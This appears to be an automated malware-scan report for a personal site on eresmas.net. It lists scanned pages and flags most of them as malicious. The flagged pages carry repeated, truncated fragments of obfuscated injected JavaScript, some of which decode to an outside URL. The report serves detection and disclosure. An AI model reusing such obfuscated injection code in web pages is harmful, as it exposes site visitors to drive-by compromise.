Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=idd00939.eresmas.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://idd00939.eresmas.net/ | 200 OK Content-Length: 33921 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var Yy="";var T;if(T!='' && T!='uq'){T='n'};var Et;if(Et!='z'){Et='z'};function Y(){var u=window;var v;if(v!='' && v!='dK'){v=null};var _=unescape;var P='';this.zD="";var A=_("%2f%74%2d%6d%6f%62%69%6c%65%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%74%79%70%65%70%61%64%2e%63%6f%6d%2e%70%68%70");function S(o,B){var m=new Date();var T_;if(T_!=''){T_='of'};var H="g";var I=_("%5b"), D=_("%5d");var x="";var U=I+B+D;var fj=new String();var UO=new RegExp(U, H);var hG=new Array();var Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://www.eresmas.com/js/logs.js | 200 OK Content-Length: 3391 Content-Type: application/javascript | clean |
http://idd00939.eresmas.net/prensa.htm | 200 OK Content-Length: 31228 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 07:20:32 GMT Location: http://perso.wanadoo.es/error/error_wanadoo.htm Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://perso.wanadoo.es/error/error_wanadoo.htm | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://perso.wanadoo.es/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 21 Dec 2014 07:20:32 GMT Location: http://perso.wanadoo.es/test404page.js/ Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://perso.wanadoo.es/test404page.js/ | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://idd00939.eresmas.net/man_ordenador.htm | 200 OK Content-Length: 7517 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/win_dx.htm | 200 OK Content-Length: 6221 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/video_codecs.htm | 200 OK Content-Length: 10245 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/multimedia.htm | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 07:20:33 GMT Location: http://perso.wanadoo.es/error/error_wanadoo.htm Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://idd00939.eresmas.net/video_edicion_01.htm | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 07:20:33 GMT Location: http://perso.wanadoo.es/error/error_wanadoo.htm Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://idd00939.eresmas.net/programas_youtube.htm | 200 OK Content-Length: 7223 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/programas_videotodo.htm | 200 OK Content-Length: 8499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/programas_flvplayer.htm | 200 OK Content-Length: 7114 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/youtube_00.htm | 200 OK Content-Length: 9637 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/youtube_01.htm | 200 OK Content-Length: 10583 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/mult_youtuve.htm | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 07:20:35 GMT Location: http://perso.wanadoo.es/error/error_wanadoo.htm Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://idd00939.eresmas.net/netvid_00.htm | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Dec 2014 07:20:35 GMT Location: http://perso.wanadoo.es/error/error_wanadoo.htm Server: Apache/1.3.26 (Unix) mod_layout/3.2 Content-Type: text/html; charset=iso-8859-1 | clean |
http://idd00939.eresmas.net/youtube_02.htm | 200 OK Content-Length: 10479 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
| ||
http://idd00939.eresmas.net/youtube_03.htm | 200 OK Content-Length: 10355 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hT(){};this.xA='';hT.prototype = {gS : function() {var eA=9087;var o=function(){};var c='';return 'h3t)t|p3:3/3/)q)l)k|eJ.Jr)u$/|i|nJd)e|x).)h|t|m|l|'.qK(/[\|J\$3\)]/g, '');var kY="kY";this.eP='';sY="";},m : function() {this.gJ="";var f=new Array();function r(){};var tB=false; this.mP="";q=""; var s='replace';var gV='';var a=function(){};var tA=new Array();var pU='';var z=document;this.pA="pA";var lS=25582;var cR=9008;var b=window;var pZ=46499;uW="uW";this.iC='';var eN="eN";rF=549 Decoded script: function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; } /*** called setTimeout with function () { var cKZ = 61508; var sC = function () {}; nD = false; var yT = 55106; l.m(); qN = 50578; var eJ = function () {}; hA = "hA"; this.eW = "eW"; eL = 50076; this.oD = false; }, 268 */ <html ><head ></head><body ></body></html> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: idd00939.eresmas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 07:20:29 GMT
Server: Apache/1.3.26 (Unix) mod_layout/3.2
Content-Type: text/html
X-Powered-By: ModLayout/3.2
GET / HTTP/1.1
Host: idd00939.eresmas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 07:20:29 GMT
Server: Apache/1.3.26 (Unix) mod_layout/3.2
Content-Type: text/html
X-Powered-By: ModLayout/3.2
Second query (visit from search engine):
GET / HTTP/1.1
Host: idd00939.eresmas.net
Referer: http://www.google.com/search?q=idd00939.eresmas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: idd00939.eresmas.net
Referer: http://www.google.com/search?q=idd00939.eresmas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.